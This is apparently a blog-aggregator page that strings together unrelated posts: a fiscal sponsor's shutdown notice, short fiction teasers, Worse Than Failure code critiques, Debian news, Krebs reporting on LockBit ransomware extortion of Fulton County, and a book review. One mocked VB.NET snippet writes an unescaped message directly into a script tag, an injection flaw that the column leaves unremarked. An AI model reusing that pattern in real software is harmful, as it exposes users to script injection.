OCF was created by Open Collective Inc. (OCI), a company formed in 2015 with the goal of "enabling groups to quickly set up a collective, raise funds and manage them transparently." Soon after being founded by OCI, OCF went through a period of rapid growth. We responded to increased demand arising from the COVID-19 pandemic without taking the time to establish the appropriate systems and infrastructure to sustain that growth.

Unfortunately, over the past year, we have learned that Open Collective Foundation's business model is not sustainable with the number of complex services we have offered and the fees we pay to the Open Collective Inc. tech platform.

In late 2023, we made the decision to pause accepting new collectives in order to create space for us to address the issues. Unfortunately, it became clear that it would not be financially feasible to make the necessary corrections, and we determined that OCF is not viable.

What's next:

We know this news will raise questions for many of our collectives. We will be making space for questions and reactions in the coming weeks.

In the meantime, we have developed this FAQ which we will keep updated as more questions come in.

What you need to do next:

  • Review the FAQ
  • Discuss your options within your collective. Your options are:
    • spend down and close out your collective
    • spend down and transfer your collective to another fiscal sponsor, or
    • transfer your collective and funds to another charitable organization.
  • Reply-all to this email with any questions, requests, or to set up a time to talk. Please make sure generalinquiries@opencollective.org is copied on your email.

Dates to know:

  • Last day to accept funds/receive donations: March 15, 2024
  • Last day collectives can have employees: June 30, 2024
  • Last day to spend or transfer funds: September 30, 2024

In Care & Accompaniment,
Mike Strode
Program Officer
Open Collective Foundation

Our mailing address has changed! We are now located at 440 N. Barranca Avenue #3717, Covina, CA 91723, USA

365 TomorrowsDouble Shot Salvation

Author: Zayan Guedim Once caught by Sheriff Jeb, criminals faced a gruesome demise. Grave offenses or petty misdemeanors, all the same, he would drive them to the abandoned silver mine. Then alone he would return, with bloody clothes and a blanched face. A judge, jury, and executioner all in one, Jeb’s reputation spread far and […]

The post Double Shot Salvation appeared first on 365tomorrows.

Worse Than FailureCodeSOD: You Need an Alert

Gabe enjoys it when clients request that he does updates on old software. For Gabe, it's exciting: you never know what you'll discover.

Public Sub AspJavaMessage(ByVal Message As String)
  System.Web.HttpContext.Current.Response.Write("<SCRIPT LANGUAGE=""JavaScript"">" & vbCrLf)
  System.Web.HttpContext.Current.Response.Write("alert(""" & Message & """)" & vbCrLf)
  System.Web.HttpContext.Current.Response.Write("</SCRIPT>")
End Sub

This is server-side ASP .Net code.

Let's start with the function name: AspJavaMessage. We already know we're using ASP, or at least I hope we are. We aren't using Java, but JavaScript. I'm not confident the developer behind this is entirely clear on the difference.

Then we do a Response.Write to output some JavaScript, but we need to talk about the Response object a bit. In ASP .Net, you mostly receive your HttpResponse as part of the event that triggered your response. The only reason you'd want to access the HttpResponse through this long System.Web.HttpContext.Current.Response accessor is because you are in a lower-level module which, for some reason, hasn't been passed an HTTP response.

That's a long-winded way of saying, "This is a code smell, and this function likely exists in a layer that shouldn't be tampering with the HTTP response."

Then, of course, we have the ALL CAPS HTML tag, followed by a JavaScript alert() call, aka, the worst way to pop up notifications in a web page.

Ugly, awful, and hinting at far worse choices in the overall application architecture. Gabe certainly unearthed a… delightful treat.

[Advertisement] Otter - Provision your servers automatically without ever needing to log-in to a command prompt. Get started today!

,

Worse Than FailureCodeSOD: A Split Purpose

Let's say you had input in the form of field=value, and you wanted to pick that "value" part off. In C#, you'd likely just use String.Split and call it a day. But you're not RK's co-worker.

public string FilterArg(string value)
{
    bool blAction;
    if (value.Contains('='))
        blAction = false;
    else
        blAction = true;

    string tmpValue = string.Empty;

    foreach (char t in value)
    {
        if (t == '=')
        {
            blAction = true;
        }
        else if (t != ' ' && blAction == true)
        {
            tmpValue += t;
        }
    }
    return tmpValue;
}

If the input contains an =, we set blAction to false. Then we iterate across our input, one character at a time. If the character we're on is an =, we set blAction to true. Otherwise, if the character we're on is not a space, and blAction is true, we append the current character to our output.

I opened by suggesting we were going to look at a home-grown split function, because at first glance, that's what this code looks like.

It does the job, but the mix of flags and loops and my inability to read sometimes makes it extra confusing to follow.

[Advertisement] Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.

365 TomorrowsCausal Fridays

Author: Majoki As he entered the lab, no one was directly staring at Etherid, but he felt all eyes on him. No doubt because of the neon orange Hawaiian shirt and optic green shorts he was sporting. As a new hire in his first week, he’d gotten an email yesterday from HR with the subject […]

The post Causal Fridays appeared first on 365tomorrows.

,

Cryptogram China Surveillance Company Hacked

Last week, someone posted something like 570 files, images and chat logs from a Chinese company called I-Soon. I-Soon sells hacking and espionage services to Chinese national and local government.

Lots of details in the news articles.

These aren’t details about the tools or techniques, more the inner workings of the company. And they seem to primarily be hacking regionally.

Worse Than FailureCodeSOD: Climbing Optimization Mountain

"Personal Mountains" was hearing dire rumors about one of the other developers; rumors about both the quality of their work and their future prospects at the company. Fortunately for Personal Mountains, they never actually had to work with this person.

Unfortunately, that person was fired and 30,000 lines of code were now Personal Mountains' responsibility.

Fortunately, it's not really 30,000 lines of code.

list.DeleteColumn(61);
list.DeleteColumn(60);
list.DeleteColumn(59);
list.DeleteColumn(58);
list.DeleteColumn(57);
list.DeleteColumn(56);
list.DeleteColumn(55);
list.DeleteColumn(54);
list.DeleteColumn(53);
list.DeleteColumn(52);
list.DeleteColumn(51);
list.DeleteColumn(50);
list.DeleteColumn(49);
list.DeleteColumn(48);
list.DeleteColumn(47);
list.DeleteColumn(46);
list.DeleteColumn(45);
list.DeleteColumn(44);
list.DeleteColumn(43);
list.DeleteColumn(42);
list.DeleteColumn(41);
list.DeleteColumn(40);
list.DeleteColumn(39);
list.DeleteColumn(38);
list.DeleteColumn(37);
list.DeleteColumn(36);
list.DeleteColumn(35);
list.DeleteColumn(34);
list.DeleteColumn(33);
list.DeleteColumn(32);
list.DeleteColumn(31);
list.DeleteColumn(30);
list.DeleteColumn(29);
list.DeleteColumn(28);
list.DeleteColumn(27);
list.DeleteColumn(26);
list.DeleteColumn(25);
list.DeleteColumn(24);
list.DeleteColumn(23);
list.DeleteColumn(22);
list.DeleteColumn(21);
list.DeleteColumn(20);
list.DeleteColumn(19);
list.DeleteColumn(18);
list.DeleteColumn(17);
list.DeleteColumn(16);
list.DeleteColumn(15);
list.DeleteColumn(14);
list.DeleteColumn(13);
list.DeleteColumn(12);
list.DeleteColumn(11);
list.DeleteColumn(10);
list.DeleteColumn(9);
list.DeleteColumn(8);
list.DeleteColumn(7);
list.DeleteColumn(6);
list.DeleteColumn(5);
list.DeleteColumn(4);
list.DeleteColumn(3);
list.DeleteColumn(2);
list.DeleteColumn(1);
list.DeleteColumn(0);

Comments in the code indicated that this was done for "extreme optimization", which leads me to believe someone heard about loop unrolling and decided to just do that everywhere there was a loop, without regard to whether or not it actually helped performance in any specific case, whether the loop was run frequently enough to justify the optimization, or understanding if the compiler might be more capable at deciding when and where to unroll a loop.

Within a few weeks, Personal Mountains was able to shrink the program from 30,000 lines of code to 10,000, with no measurable impact on its behavior or performance.

[Advertisement] Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.

365 TomorrowsWhere We Live

Author: Julian Miles, Staff Writer Yesterday I climbed Everest with Hillary. Tomorrow I’m travelling as a passenger on the 1888 Orient Express. Today? I’ve been asked to make a presentation to you all about what we’re doing here at the Human Existence Archive. My name is Preston Hardy, and I used to be a laboratory […]

The post Where We Live appeared first on 365tomorrows.

Planet DebianSergio Durigan Junior: Planning to orphan Pagure on Debian

I have been thinking more and more about orphaning the Pagure Debian package. I don’t have the time to maintain it properly anymore, and I have also lost interest in doing so.

What’s Pagure

Pagure is a git forge written entirely in Python using pygit2. It was almost entirely developed by one person, Pierre-Yves Chibon. He is (was?) a Red Hat employee and started working on this new git forge almost 10 years ago because the company wanted to develop something in-house for Fedora. The software is amazing and I admire Pierre-Yves quite a lot for what he was able to achieve basically alone. Unfortunately, a few years ago Fedora decided to move to Gitlab and the Pagure development pretty much stalled.

Pagure in Debian

Packaging Pagure for Debian was hard, but it was also very fun. I learned quite a bit about many things (packaging and non-packaging related), interacted with the upstream community, decided to dogfood my own work and run my Pagure instance for a while, and tried to get newcomers to help me with the package (without much success, unfortunately).

I remember that when I had started to package Pagure, Debian was also moving away from Alioth and discussing options. For a brief moment Pagure was a contender, but in the end the community decided to self-host Gitlab, and that’s why we have Salsa now. I feel like I could have tipped the scales in favour of Pagure had I finished packaging it for Debian before the decision was made, but then again, to the best of my knowledge Salsa doesn’t use our Gitlab package anyway…

Are you interested in maintaining it?

If you’re interested in maintaining the package, please get in touch with me. I will happily pass the torch to someone else who is still using the software and wants to keep it healthy in Debian. If there is nobody interested, then I will just orphan it.

Krebs on SecurityFBI’s LockBit Takedown Postponed a Ticking Time Bomb in Fulton County, Ga.

The FBI’s takedown of the LockBit ransomware group last week came as LockBit was preparing to release sensitive data stolen from government computer systems in Fulton County, Ga. But LockBit is now regrouping, and the gang says it will publish the stolen Fulton County data on March 2 unless paid a ransom. LockBit claims the cache includes documents tied to the county’s ongoing criminal prosecution of former President Trump, but court watchers say teaser documents published by the crime gang suggest a total leak of the Fulton County data could put lives at risk and jeopardize a number of other criminal trials.

A new LockBit website listing a countdown timer until the promised release of data stolen from Fulton County, Ga.

In early February, Fulton County leaders acknowledged they were responding to an intrusion that caused disruptions for its phone, email and billing systems, as well as a range of county services, including court systems.

On Feb. 13, the LockBit ransomware group posted on its victim shaming blog a new entry for Fulton County, featuring a countdown timer saying the group would publish the data on Feb. 16 unless county leaders agreed to negotiate a ransom.

“We will demonstrate how local structures negligently handled information protection,” LockBit warned. “We will reveal lists of individuals responsible for confidentiality. Documents marked as confidential will be made publicly available. We will show documents related to access to the state citizens’ personal data. We aim to give maximum publicity to this situation; the documents will be of interest to many. Conscientious residents will bring order.”

Yet on Feb. 16, the entry for Fulton County was removed from LockBit’s site without explanation. This usually only happens after the victim in question agrees to pay a ransom demand and/or enters into negotiations with their extortionists.

However, Fulton County Commission Chairman Robb Pitts said the board decided it “could not in good conscience use Fulton County taxpayer funds to make a payment.”

“We did not pay nor did anyone pay on our behalf,” Pitts said at an incident briefing on Feb. 20.

Just hours before that press conference, LockBit’s various websites were seized by the FBI and the U.K.’s National Crime Agency (NCA), which replaced the ransomware group’s homepage with a seizure notice and used the existing design of LockBit’s victim shaming blog to publish press releases about the law enforcement action.

The feds used the existing design on LockBit’s victim shaming website to feature press releases and free decryption tools.

Dubbed “Operation Cronos,” the effort involved the seizure of nearly three-dozen servers; the arrest of two alleged LockBit members; the release of a free LockBit decryption tool; and the freezing of more than 200 cryptocurrency accounts thought to be tied to the gang’s activities. The government says LockBit has claimed more than 2,000 victims worldwide and extorted over $120 million in payments.

UNFOLDING DISASTER

In a lengthy, rambling letter published on Feb. 24 and addressed to the FBI, the ransomware group’s leader LockBitSupp announced that their victim shaming websites were once again operational on the dark web, with fresh countdown timers for Fulton County and a half-dozen other recent victims.

“The FBI decided to hack now for one reason only, because they didn’t want to leak information fultoncountyga.gov,” LockBitSupp wrote. “The stolen documents contain a lot of interesting things and Donald Trump’s court cases that could affect the upcoming US election.”

A screen shot released by LockBit showing various Fulton County file shares that were exposed.

LockBit has already released roughly two dozen files allegedly stolen from Fulton County government systems, although none of them involve Mr. Trump’s criminal trial. But the documents do appear to include court records that are sealed and shielded from public viewing.

George Chidi writes The Atlanta Objective, a Substack publication on crime in Georgia’s capital city. Chidi says the leaked data so far includes a sealed record related to a child abuse case, and a sealed motion in the murder trial of Juwuan Gaston demanding the state turn over confidential informant identities.

Chidi cites reports from a Fulton County employee who said the confidential material includes the identities of jurors serving on the trial of the rapper Jeffery “Young Thug” Williams, who is charged along with five other defendants in a racketeering and gang conspiracy.

“The screenshots suggest that hackers will be able to give any attorney defending a criminal case in the county a starting place to argue that evidence has been tainted or witnesses intimidated, and that the release of confidential information has compromised cases,” Chidi wrote. “Judge Ural Glanville has, I am told by staff, been working feverishly behind the scenes over the last two weeks to manage the unfolding disaster.”

LockBitSupp also denied assertions made by the U.K.’s NCA that LockBit did not delete stolen data as promised when victims agreed to pay a ransom. The accusation is an explosive one because nobody will pay a ransom if they don’t believe the ransomware group will hold up its end of the bargain.

The ransomware group leader also confirmed information first reported here last week, that federal investigators managed to hack LockBit by exploiting a known vulnerability in PHP, a scripting language that is widely used in Web development.

“Due to my personal negligence and irresponsibility I relaxed and did not update PHP in time,” LockBitSupp wrote. “As a result of which access was gained to the two main servers where this version of PHP was installed.”

LockBitSupp’s FBI letter said the group kept copies of its stolen victim data on servers that did not use PHP, and that consequently it was able to retain copies of files stolen from victims. The letter also listed links to multiple new instances of LockBit dark net websites, including the leak page listing Fulton County’s new countdown timer.

LockBit’s new data leak site promises to release stolen Fulton County data on March 2, 2024, unless paid a ransom demand.

“Even after the FBI hack, the stolen data will be published on the blog, there is no chance of destroying the stolen data without payment,” LockBitSupp wrote. “All FBI actions are aimed at destroying the reputation of my affiliate program, my demoralization, they want me to leave and quit my job, they want to scare me because they can not find and eliminate me, I can not be stopped, you can not even hope, as long as I am alive I will continue to do pentest with postpaid.”

DOX DODGING

In January 2024, LockBitSupp told XSS forum members he was disappointed the FBI hadn’t offered a reward for his doxing and/or arrest, and that in response he was placing a bounty on his own head — offering $10 million to anyone who could discover his real name.

After the NCA and FBI seized LockBit’s site, the group’s homepage was retrofitted with a blog entry titled, “Who is LockBitSupp? The $10M question.” The teaser made use of LockBit’s own countdown timer, and suggested the real identity of LockBitSupp would soon be revealed.

However, after the countdown timer expired the page was replaced with a taunting message from the feds, but it included no new information about LockBitSupp’s identity.

On Feb. 21, the U.S. Department of State announced rewards totaling up to $15 million for information leading to the arrest and/or conviction of anyone participating in LockBit ransomware attacks. The State Department said $10 million of that is for information on LockBit’s leaders, and up to $5 million is offered for information on affiliates.

In an interview with the malware-focused Twitter/X account Vx-Underground, LockBit staff asserted that authorities had arrested a couple of small-time players in their operation, and that investigators still do not know the real-life identities of the core LockBit members, or that of their leader.

“They assert the FBI / NCA UK / EUROPOL do not know their information,” Vx-Underground wrote. “They state they are willing to double the bounty of $10,000,000. They state they will place a $20,000,000 bounty of their own head if anyone can dox them.”

TROUBLE ON THE HOMEFRONT?

In the weeks leading up to the FBI/NCA takedown, LockBitSupp became embroiled in a number of high-profile personal and business disputes on the Russian cybercrime forums.

Earlier this year, someone used LockBit ransomware to infect the networks of AN-Security, a venerated 30-year-old security and technology company based in St. Petersburg, Russia. This violated the golden rule for cybercriminals based in Russia and former soviet nations that make up the Commonwealth of Independent States, which is that attacking your own citizens in those countries is the surest way to get arrested and prosecuted by local authorities.

LockBitSupp later claimed the attacker had used a publicly leaked, older version of LockBit to compromise systems at AN-Security, and said the attack was an attempt to smear their reputation by a rival ransomware group known as “Clop.” But the incident no doubt prompted closer inspection of LockBitSupp’s activities by Russian authorities.

Then in early February, the administrator of the Russian-language cybercrime forum XSS said LockBitSupp had threatened to have him killed after the ransomware group leader was banned by the community. LockBitSupp was excommunicated from XSS after he refused to pay an arbitration amount ordered by the forum administrator. That dispute related to a complaint from another forum member who said LockBitSupp recently stiffed him on his promised share of an unusually large ransomware payout.

A posted by the XSS administrator saying LockBitSupp wanted him dead.

INTERVIEW WITH LOCKBITSUPP

KrebsOnSecurity sought comment from LockBitSupp at the ToX instant messenger ID listed in his letter to the FBI. LockBitSupp declined to elaborate on the unreleased documents from Fulton County, saying the files will be available for everyone to see in a few days.

LockBitSupp said his team was still negotiating with Fulton County when the FBI seized their servers, which is why the county has been granted a time extension. He also denied threatening to kill the XSS administrator.

“I have not threatened to kill the XSS administrator, he is blatantly lying, this is to cause self-pity and damage my reputation,” LockBitSupp told KrebsOnSecurity. “It is not necessary to kill him to punish him, there are more humane methods and he knows what they are.”

Asked why he was so certain the FBI doesn’t know his real-life identity, LockBitSupp was more precise.

“I’m not sure the FBI doesn’t know who I am,” he said. “I just believe they will never find me.”

It seems unlikely that the FBI’s seizure of LockBit’s infrastructure was somehow an effort to stave off the disclosure of Fulton County’s data, as LockBitSupp maintains. For one thing, Europol said the takedown was the result of a months-long infiltration of the ransomware group.

Also, in reporting on the attack’s disruption to the office of Fulton County District Attorney Fani Willis on Feb. 14, CNN reported that by then the intrusion by LockBit had persisted for nearly two and a half weeks.

Finally, if the NCA and FBI really believed that LockBit never deleted victim data, they had to assume LockBit would still have at least one copy of all their stolen data hidden somewhere safe.

Fulton County is still trying to recover systems and restore services affected by the ransomware attack. “Fulton County continues to make substantial progress in restoring its systems following the recent ransomware incident resulting in service outages,” reads the latest statement from the county on Feb. 22. “Since the start of this incident, our team has been working tirelessly to bring services back up.”

Update, Feb. 29, 3:22 p.m. ET: Just hours after this story ran, LockBit changed its countdown timer for Fulton County saying they had until the morning of Feb. 29 (today) to pay a ransonm demand. When the official deadline neared today, Fulton County’s listing was removed from LockBit’s victim shaming website. Asked about the removal of the listing, LockBit’s leader “LockBitSupp” told KrebsOnSecurity that Fulton County paid a ransom demand. County officials have scheduled a press conference on the ransomware attack at 4:15 p.m. ET today.

Planet DebianFreexian Collaborators: Long term support for Samba 4.17

Freexian is pleased to announce a partnership with Catalyst to extend the security support of Samba 4.17, which is the version packaged in Debian 12 Bookworm. Samba 4.17 will reach upstream’s end-of-support this upcoming March (2024), and the goal of this partnership is to extend it until June 2028 (i.e. the end of Debian 12’s regular security support).

One of the main aspects of this project is that it will also include support for Samba as Active Directory Domain Controller (AD-DC). Unfortunately, support for Samba as AD-DC in Debian 11 Bullseye, Debian 10 Buster and older releases has been discontinued before the end of the life cycle of those Debian releases. So we really expect to improve the situation of Samba in Debian 12 Bookworm, ensuring full support during the 5 years of regular security support.

We would like to mention that this is an experiment, and we will do our best to make it a success, and to try to continue it for Samba versions included in future Debian releases.

Our long term goal is to bring confidence to Samba’s upstream development community that they can mark some releases as being supported for 5 years (or more) and that the corresponding work will be funded by companies that benefit from this work (because we would have already built that community).

If your company relies on Samba and wants to help sustain LTS versions of Samba, please reach out to us. For companies using Debian, the simplest way is to subscribe to our Debian LTS offer at a gold level (or above) and let us know that you want to contribute to Samba LTS when you send your subscription form. For others, please reach out to us at sales@freexian.com and we will figure out a way to contribute.

In the mean time, this project has been possible thanks to the current LTS sponsors and ELTS customers. We hope the whole community of Debian and Samba users will benefit from it.

For any question, don’t hesitate to contact us.

,

Planet DebianBen Hutchings: Converted from Pyblosxom to Jekyll

I’ve been using Pyblosxom here for nearly 17 years, but have become increasingly dissatisfied with having to write HTML instead of Markdown.

Today I looked at upgrading my web server and discovered that Pyblosxom was removed from Debian after Debian 10, presumably because it wasn’t updated for Python 3.

I keep hearing about Jekyll as a static site generator for blogs, so I finally investigated how to use that and how to convert my existing entries. Fortunately it supports both HTML and Markdown (and probably other) input formats, so this was mostly a matter of converting metadata.

I have my own crappy script for drafting, publishing, and listing blog entries, which also needed a bit of work to update, but that is now done.

If all has gone to plan, you should be seeing just one new entry in the feed but all permalinks to older entries still working.

Cory DoctorowThe Majority of Censorship is Self-Censorship

Burning of 'dirt and trash literature' at the 18th Elementary school in Berlin-Pankow (Buchholz), on the evening of International Children's Day, June 1st, 1955. It was the first of a wave of initiatives by the Parents-Teachers Association (Elternversammlungen), to legally ban 'trash and filth.'

Today for my podcast, I read The majority of censorship is self-censorship, originally published in my Pluralistic blog. It’s a breakdown of Ada Palmer’s excellent Reactor essay about the modern and historical context of censorship.

I recorded this on a day when I was home between book-tour stops (I’m out with my new techno crime-thriller, The Bezzle. Catch me tomorrow (Monday) in Seattle with Neal Stephenson at Third Place Books. Then it’s Powell’s in Portland, and then Tuscon. The canonical link for the schedule is here.

States – even very powerful states – that wish to censor lack the resources to accomplish totalizing censorship of the sort depicted in Nineteen Eighty-Four. They can’t go from house to house, searching every nook and cranny for copies of forbidden literature. The only way to kill an idea is to stop people from expressing it in the first place. Convincing people to censor themselves is, “dollar for dollar and man-hour for man-hour, much cheaper and more impactful than anything else a censorious regime can do.”

Ada invokes examples modern and ancient, including from her own area of specialty, the Inquisition and its treatment of Gailileo. The Inquistions didn’t set out to silence Galileo. If that had been its objective, it could have just assassinated him. This was cheap, easy and reliable! Instead, the Inquisition persecuted Galileo, in a very high-profile manner, making him and his ideas far more famous.

But this isn’t some early example of Inquisitorial Streisand Effect. The point of persecuting Galileo was to convince Descartes to self-censor, which he did. He took his manuscript back from the publisher and cut the sections the Inquisition was likely to find offensive. It wasn’t just Descartes: “thousands of other major thinkers of the time wrote differently, spoke differently, chose different projects, and passed different ideas on to the next century because they self-censored after the Galileo trial.”


MP3


Here’s that tour schedule!

26 Feb: Third Place Books, Seattle, 19h, with Neal Stephenson (!!!)
https://www.thirdplacebooks.com/event/cory-doctorow

27 Feb: Powell’s, Portland, 19h:
https://www.powells.com/book/the-bezzle-martin-hench-2-9781250865878/1-2

29 Feb: Changing Hands, Phoenix, 1830h:
https://www.changinghands.com/event/february2024/cory-doctorow

9-10 Mar: Tucson Festival of the Book:
https://tucsonfestivalofbooks.org/?action=display_author&amp;id=15669

13 Mar: San Francisco Public Library, details coming soon!

23 or 24 Mar: Toronto, details coming soon!

25-27 Mar: NYC and DC, details coming soon!

29-31 Mar: Wondercon Anaheim:
https://www.comic-con.org/wc/

11 Apr: Boston, details coming soon!

12 Apr: RISD Debates in AI, Providence, details coming soon!

17 Apr: Anderson’s Books, Chicago, 19h:
https://www.andersonsbookshop.com/event/cory-doctorow-1

19-21 Apr: Torino Biennale Tecnologia
https://www.turismotorino.org/en/experiences/events/biennale-tecnologia

2 May, Canadian Centre for Policy Alternatives, Winnipeg
https://www.eventbrite.ca/e/cory-doctorow-tickets-798820071337

5-11 May: Tartu Prima Vista Literary Festival
https://tartu2024.ee/en/kirjandusfestival/

6-9 Jun: Media Ecology Association keynote, Amherst, NY
https://media-ecology.org/convention

365 TomorrowsStarship Lovers

Author: Matthew Miehe The large hangar was where starships sat to be scrapped or bought by new owners. It’s also where Hammer-II, a blue and grey cargo cruiser, had found love. When he flew into the dock, Argus Luxury Model (serial code 11727) was the first thing he laid his eyes on. She was a […]

The post Starship Lovers appeared first on 365tomorrows.

Planet DebianRuss Allbery: Review: The Fund

Review: The Fund, by Rob Copeland

Publisher: St. Martin's Press
Copyright: 2023
ISBN: 1-250-27694-2
Format: Kindle
Pages: 310

I first became aware of Ray Dalio when either he or his publisher plastered advertisements for The Principles all over the San Francisco 4th and King Caltrain station. If I recall correctly, there were also constant radio commercials; it was a whole thing in 2017. My brain is very good at tuning out advertisements, so my only thought at the time was "some business guy wrote a self-help book." I think I vaguely assumed he was a CEO of some traditional business, since that's usually who writes heavily marketed books like this. I did not connect him with hedge funds or Bridgewater, which I have a bad habit of confusing with Blackwater.

The Principles turns out to be more of a laundered cult manual than a self-help book. And therein lies a story.

Rob Copeland is currently with The New York Times, but for many years he was the hedge fund reporter for The Wall Street Journal. He covered, among other things, Bridgewater Associates, the enormous hedge fund founded by Ray Dalio. The Fund is a biography of Ray Dalio and a history of Bridgewater from its founding as a vehicle for Dalio's advising business until 2022 when Dalio, after multiple false starts and title shuffles, finally retired from running the company. (Maybe. Based on the history recounted here, it wouldn't surprise me if he was back at the helm by the time you read this.)

It is one of the wildest, creepiest, and most abusive business histories that I have ever read.

It's probably worth mentioning, as Copeland does explicitly, that Ray Dalio and Bridgewater hate this book and claim it's a pack of lies. Copeland includes some of their denials (and many non-denials that sound as good as confirmations to me) in footnotes that I found increasingly amusing.

A lawyer for Dalio said he "treated all employees equally, giving people at all levels the same respect and extending them the same perks."

Uh-huh.

Anyway, I personally know nothing about Bridgewater other than what I learned here and the occasional mention in Matt Levine's newsletter (which is where I got the recommendation for this book). I have no independent information whether anything Copeland describes here is true, but Copeland provides the typical extensive list of notes and sourcing one expects in a book like this, and Levine's comments indicated it's generally consistent with Bridgewater's industry reputation. I think this book is true, but since the clear implication is that the world's largest hedge fund was primarily a deranged cult whose employees mostly spied on and rated each other rather than doing any real investment work, I also have questions, not all of which Copeland answers to my satisfaction. But more on that later.

The center of this book are the Principles. These were an ever-changing list of rules and maxims for how people should conduct themselves within Bridgewater. Per Copeland, although Dalio later published a book by that name, the version of the Principles that made it into the book was sanitized and significantly edited down from the version used inside the company. Dalio was constantly adding new ones and sometimes changing them, but the common theme was radical, confrontational "honesty": never being silent about problems, confronting people directly about anything that they did wrong, and telling people all of their faults so that they could "know themselves better."

If this sounds like textbook abusive behavior, you have the right idea. This part Dalio admits to openly, describing Bridgewater as a firm that isn't for everyone but that achieves great results because of this culture. But the uncomfortably confrontational vibes are only the tip of the iceberg of dysfunction. Here are just a few of the ways this played out according to Copeland:

  • Dalio decided that everyone's opinions should be weighted by the accuracy of their previous decisions, to create a "meritocracy," and therefore hired people to build a social credit system in which people could use an app to constantly rate all of their co-workers. This almost immediately devolved into out-group bullying worthy of a high school, with employees hurriedly down-rating and ostracizing any co-worker that Dalio down-rated.

  • When an early version of the system uncovered two employees at Bridgewater with more credibility than Dalio, Dalio had the system rigged to ensure that he always had the highest ratings and was not affected by other people's ratings.

  • Dalio became so obsessed with the principle of confronting problems that he created a centralized log of problems at Bridgewater and required employees find and report a quota of ten or twenty new issues every week or have their bonus docked. He would then regularly pick some issue out of the issue log, no matter how petty, and treat it like a referendum on the worth of the person responsible for the issue.

  • Dalio's favorite way of dealing with a problem was to put someone on trial. This involved extensive investigations followed by a meeting where Dalio would berate the person and harshly catalog their flaws, often reducing them to tears or panic attacks, while smugly insisting that having an emotional reaction to criticism was a personality flaw. These meetings were then filmed and added to a library available to all Bridgewater employees, often edited to remove Dalio's personal abuse and to make the emotional reaction of the target look disproportionate. The ones Dalio liked the best were shown to all new employees as part of their training in the Principles.

  • One of the best ways to gain institutional power in Bridgewater was to become sycophantically obsessed with the Principles and to be an eager participant in Dalio's trials. The highest levels of Bridgewater featured constant jockeying for power, often by trying to catch rivals in violations of the Principles so that they would be put on trial.

In one of the common and all-too-disturbing connections between Wall Street finance and the United States' dysfunctional government, James Comey (yes, that James Comey) ran internal security for Bridgewater for three years, meaning that he was the one who pulled evidence from surveillance cameras for Dalio to use to confront employees during his trials.

In case the cult vibes weren't strong enough already, Bridgewater developed its own idiosyncratic language worthy of Scientology. The trials were called "probings," firing someone was called "sorting" them, and rating them was called "dotting," among many other Bridgewater-specific terms. Needless to say, no one ever probed Dalio himself. You will also be completely unsurprised to learn that Copeland documents instances of sexual harassment and discrimination at Bridgewater, including some by Dalio himself, although that seems to be a relatively small part of the overall dysfunction. Dalio was happy to publicly humiliate anyone regardless of gender.

If you're like me, at this point you're probably wondering how Bridgewater continued operating for so long in this environment. (Per Copeland, since Dalio's retirement in 2022, Bridgewater has drastically reduced the cult-like behaviors, deleted its archive of probings, and de-emphasized the Principles.) It was not actually a religious cult; it was a hedge fund that has to provide investment services to huge, sophisticated clients, and by all accounts it's a very successful one. Why did this bizarre nightmare of a workplace not interfere with Bridgewater's business?

This, I think, is the weakest part of this book. Copeland makes a few gestures at answering this question, but none of them are very satisfying.

First, it's clear from Copeland's account that almost none of the employees of Bridgewater had any control over Bridgewater's investments. Nearly everyone was working on other parts of the business (sales, investor relations) or on cult-related obsessions. Investment decisions (largely incorporated into algorithms) were made by a tiny core of people and often by Dalio himself. Bridgewater also appears to not trade frequently, unlike some other hedge funds, meaning that they probably stay clear of the more labor-intensive high-frequency parts of the business.

Second, Bridgewater took off as a hedge fund just before the hedge fund boom in the 1990s. It transformed from Dalio's personal consulting business and investment newsletter to a hedge fund in 1990 (with an earlier investment from the World Bank in 1987), and the 1990s were a very good decade for hedge funds. Bridgewater, in part due to Dalio's connections and effective marketing via his newsletter, became one of the largest hedge funds in the world, which gave it a sort of institutional momentum. No one was questioned for putting money into Bridgewater even in years when it did poorly compared to its rivals.

Third, Dalio used the tried and true method of getting free publicity from the financial press: constantly predict an upcoming downturn, and aggressively take credit whenever you were right. From nearly the start of his career, Dalio predicted economic downturns year after year. Bridgewater did very well in the 2000 to 2003 downturn, and again during the 2008 financial crisis. Dalio aggressively takes credit for predicting both of those downturns and positioning Bridgewater correctly going into them. This is correct; what he avoids mentioning is that he also predicted downturns in every other year, the majority of which never happened.

These points together create a bit of an answer, but they don't feel like the whole picture and Copeland doesn't connect the pieces. It seems possible that Dalio may simply be good at investing; he reads obsessively and clearly enjoys thinking about markets, and being an abusive cult leader doesn't take up all of his time. It's also true that to some extent hedge funds are semi-free money machines, in that once you have a sufficient quantity of money and political connections you gain access to investment opportunities and mechanisms that are very likely to make money and that the typical investor simply cannot access. Dalio is clearly good at making personal connections, and invested a lot of effort into forming close ties with tricky clients such as pools of Chinese money.

Perhaps the most compelling explanation isn't mentioned directly in this book but instead comes from Matt Levine. Bridgewater touts its algorithmic trading over humans making individual trades, and there is some reason to believe that consistently applying an algorithm without regard to human emotion is a solid trading strategy in at least some investment areas. Levine has asked in his newsletter, tongue firmly in cheek, whether the bizarre cult-like behavior and constant infighting is a strategy to distract all the humans and keep them from messing with the algorithm and thus making bad decisions.

Copeland leaves this question unsettled. Instead, one comes away from this book with a clear vision of the most dysfunctional workplace I have ever heard of, and an endless litany of bizarre events each more astonishing than the last. If you like watching train wrecks, this is the book for you. The only drawback is that, unlike other entries in this genre such as Bad Blood or Billion Dollar Loser, Bridgewater is a wildly successful company, so you don't get the schadenfreude of seeing a house of cards collapse. You do, however, get a helpful mental model to apply to the next person who tries to talk to you about "radical honesty" and "idea meritocracy."

The flaw in this book is that the existence of an organization like Bridgewater is pointing to systematic flaws in how our society works, which Copeland is largely uninterested in interrogating. "How could this have happened?" is a rather large question to leave unanswered. The sheer outrageousness of Dalio's behavior also gets a bit tiring by the end of the book, when you've seen the patterns and are hearing about the fourth variation. But this is still an astonishing book, and a worthy entry in the genre of capitalism disasters.

Rating: 7 out of 10

Planet DebianJacob Adams: AAC and Debian

Currently, in a default installation of Debian with the GNOME desktop, Bluetooth headphones that require the AAC codec1 cannot be used. As the Debian wiki outlines, using the AAC codec over Bluetooth, while technically supported by PipeWire, is explicitly disabled in Debian at this time. This is because the fdk-aac library needed to enable this support is currently in the non-free component of the repository, meaning that PipeWire, which is in the main component, cannot depend on it.

How to Fix it Yourself

